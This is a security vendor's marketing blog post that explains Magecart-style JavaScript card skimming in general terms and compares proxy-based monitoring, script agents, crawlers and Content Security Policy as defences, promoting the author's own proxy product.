Back to blog

What's the leading technology to prevent credit card skimming?

Monday, July 21st, 2025

C

Carlo D'Agnolo

Today’s main threat to credit card information is not a physical skimmer; it is online supply-chain attacks on websites. Attackers insert malicious JavaScript into payment pages. Once injected, this script is made to capture card data as it is entered in real time, often without detection.

The term Magecart is often synonymously used with these types of attacks. It originates from these kinds of attacks happening on the Magento platform, popular for e-commerce websites. It’s made up of a combination of “Magento” and “Cart” - signifying checkout carts where the attacks often take place.

Both Magento and WordPress are popular targets for client-side attacks. These attacks often target older versions of the platforms that haven’t been properly updated. Read up on the biggest Magecart attacks in history thus far.

Visa’s Spring 2025 Biannual Threats Report identifies digital skimming as one of the “most prolific and consistent threats” in the payments ecosystem. The report notes that Visa’s eCommerce Threat Disruption system (eTD) proactively scans merchant sites for skimmer signatures across North America and Europe.

Read Visa's report.

Mastercard’s own Digital Skimming: How to Stay Protected guide explains how their RiskRecon platform locates these malicious scripts, tracks their injection dates and durations, and identifies related vulnerabilities.

Read Mastercard's report.

How supply‑chain skimming works

The attacker has to have access to a JavaScript file on the targeted page. How they get it, can vary. The most common approach is to get access to a script already present on the website. These are often older plugins that weren't updated or maintained, or a 3rd-party script or marketing tool that got compromised. They then alter the script to perform their attack.

There are variants of this, as seen in the Baways (British Airways) attack. Here, an attacker was able to breach the backend and install a script directly on the BA website.

In either case, the script running client-side (i.e., in the browser) can now execute all kinds of functionalities. In skimming operations, they most often:

  • Simply copy the form fields upon submission or through keylogging
  • Redirecting the checkout page to a fake payment portal
  • Overlaying a malicious iFrame over the original payment page

Anyone that has access to JavaScript on a page can virtually do anything they want. These scripts are highly adaptable, dynamic upon various criteria, and the perfect silent way to skim credit cards and PII.

Solutions overview

Proxy-based

Client-side skimming is difficult to detect precisely because it happens outside your infrastructure. The scripts executing in your customer’s browser are dynamic, and attackers often compromise tools that already have legitimate access.

That’s why seeing the actual payload as it’s delivered to real users is critical. Without this visibility, you’re never fully certain what ran or where the compromise began.

We built our solution around a hybrid proxy model, because it's the only approach that gives full, real-time coverage across modern frontends. Every script that reaches your users passes through the proxy. It allows for full visibility of the actually delivered payload, full history and analysis of the scripts.

JavaScript-based monitoring (Agents)

Some vendors offer detection via JavaScript tags you embed in your page. This means the attacker sees it too. Think of it as a mousetrap, it can be seen and it can be avoided. If someone’s injecting scripts into your checkout, they can also modify or disable the protecting/monitoring script.

Detection-only tools also tend to trigger alerts after data has already been exfiltrated. We think prevention is better.

Crawlers

Crawler-based tools work by simulating visits to your website and capturing the scripts and resources that load during that visit. Crucially, they don't necessarily get the same script payload of an actual user. They ‘mimic’ a user.

Scripts are dynamic in nature and attackers use this to their advantage. In theory, and in practice, these crawlers are noticeable and thus, avoidable.

Crawlers are useful for surface scans. But skimmers don’t operate at the surface.

Content Security Policy (CSP)

Content Security Policy (CSP) is a browser feature that allows site owners to define which sources of content (like scripts) are allowed to load on a page. When properly configured, CSP can help block unauthorized or unexpected third-party code by restricting script origins.

It’s a valuable preventive control, especially for reducing exposure to inline script injections or loading from unknown domains. We recommend using CSP as a layer only. Because CSP can’t see the payload of the script.

In our talks and presentations, we often use the following slide to illustrate CSP:

You have 2 boxes. One holds a puppy, the other a bomb. Which is which…? That’s CSP.

Read more on CSP here.

On our compare page, we dive into the full 4 approaches laid out here in detail.

A short recap of solutions

Scripts that load in your customer’s browser can access input fields, modify content, send data elsewhere, and more.They’re dynamic, often sourced from third parties, and can be altered without your knowledge.

That’s why client-side skimming is so effective. And why preventing it requires more than surface-level scanning.

Why is the delivery path so important?

Because that’s the only way to see what actually reaches the user. Scripts are dynamic. Attackers can change them at any time, often conditionally. If you’re not in the delivery path, you’re relying on snapshots or assumptions. Sitting in the path means you see every request, for every session, in real time, and you can act on it before anything dangerous executes.

What’s the best way to prevent these attacks?

The most effective method today is our proxy-based script monitoring. It inspects every script before it reaches the browser, verifies its integrity, and blocks malicious code in real time. It works on every user session and provides full visibility, logging, and compliance coverage.

Is JavaScript-based monitoring (Agents) a good option?

It can help detect some threats, but it runs inside the same environment attackers target. If an attacker can inject a skimmer, they can likely disable or bypass the monitoring script too. It’s useful, but not enough on its own.

Is a crawler a good option?

Crawlers simulate visits to your site and log visible scripts. They’re good for periodic scans, but they don’t operate inside real sessions. If a skimmer is only active under certain conditions (like a logged-in user or a specific IP range) crawlers won’t see it.

Is CSP a good option?

CSP (Content Security Policy) can reduce risk by limiting where scripts are allowed to load from. But it doesn’t analyze what a script does once it loads. It’s a helpful layer but not a solid detection, nor prevention system.

C

More About Carlo D'Agnolo

I work on Marketing at c/side.